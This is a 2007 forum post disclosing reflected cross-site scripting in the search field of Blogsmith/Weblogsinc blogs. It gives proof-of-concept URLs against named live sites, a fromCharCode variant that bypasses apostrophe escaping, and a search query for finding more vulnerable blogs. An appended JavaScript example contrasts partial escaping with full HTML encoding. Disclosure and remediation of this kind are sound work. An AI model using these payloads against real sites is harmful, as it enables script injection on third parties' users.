Blogsmith (Weblogsinc) XSS
Posted by: digi7al64
Date: January 17, 2007 10:42PM

Reflective XSS exists in all Blogsmith and Weblogsinc blogs via the search field, which does not filter user input.

POC (no sub domains)
http://www.brianalvey.com/search/?q=%22%3A%3Cscript%3Ealert%28%27moo%27%29%3B%3C%2Fscript%3E
http://www.calacanis.com/search/?q=%22%3A%3Cscript%3Ealert%28%27moo%27%29%3B%3C%2Fscript%3E

POC (sub domains of weblogsinc) [escapes ' so it requires String.fromCharCode]
http://spam.weblogsinc.com/search/?q=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872%2C69%2C76%2C76%2C79%29%29%3B%3C%2Fscript%3E

Googledork
http://www.google.com/search?hl=en&q=powered+by+blogsmith&btnG=Google+Search&meta=

Results 1 - 10 of about 1,520,000

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/17/2007 10:43PM by digi7al64.
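Added example (JavaScript; not from the original post and not Blogsmith's own code): it contrasts the apostrophe-only escaping the post observed on the weblogsinc sub-domains with full HTML encoding of the reflected q value, using the URL-decoded payloads from the PoC links above as constructed input. The template function and the encoder names are assumptions for illustration.

```javascript
// Constructed from the PoC URLs in the post: the URL-decoded q= values.
const PAYLOADS = {
  // brianalvey.com / calacanis.com variant
  plain: `":<script>alert('moo');</script>`,
  // spam.weblogsinc.com variant (no apostrophes)
  charcode: `"><script>alert(String.fromCharCode(72,69,76,76,79));</script>`,
};

// The partial filtering the post observed on the weblogsinc sub-domains:
// only the apostrophe is backslash-escaped. That breaks alert('moo') but
// leaves the tag characters untouched, so a payload without apostrophes
// is still reflected as live markup.
function escapeApostropheOnly(s) {
  return s.replace(/'/g, "\\'");
}

// Full HTML encoding for a value reflected in HTML text or a quoted
// attribute: every character that could open a tag or close the
// attribute is replaced by an entity, whatever the payload shape.
function htmlEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// A hypothetical template that reflects the search term into the search
// box, as the vulnerable page does; only the encoder differs.
function renderSearchBox(q, encoder) {
  return `<input type="text" name="q" value="${encoder(q)}">`;
}

// True when the encoded value can neither close the value="..." attribute
// nor open a new tag, i.e. the reflection stays inert data.
function reflectionIsContained(q, encoder) {
  return !/[<>"]/.test(encoder(q));
}

// Stand-alone demo: the apostrophe-only filter fails for both payloads,
// full encoding contains both.
for (const [name, q] of Object.entries(PAYLOADS)) {
  console.log(name, "apostrophe-only:", reflectionIsContained(q, escapeApostropheOnly),
              "htmlEncode:", reflectionIsContained(q, htmlEncode));
}
```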
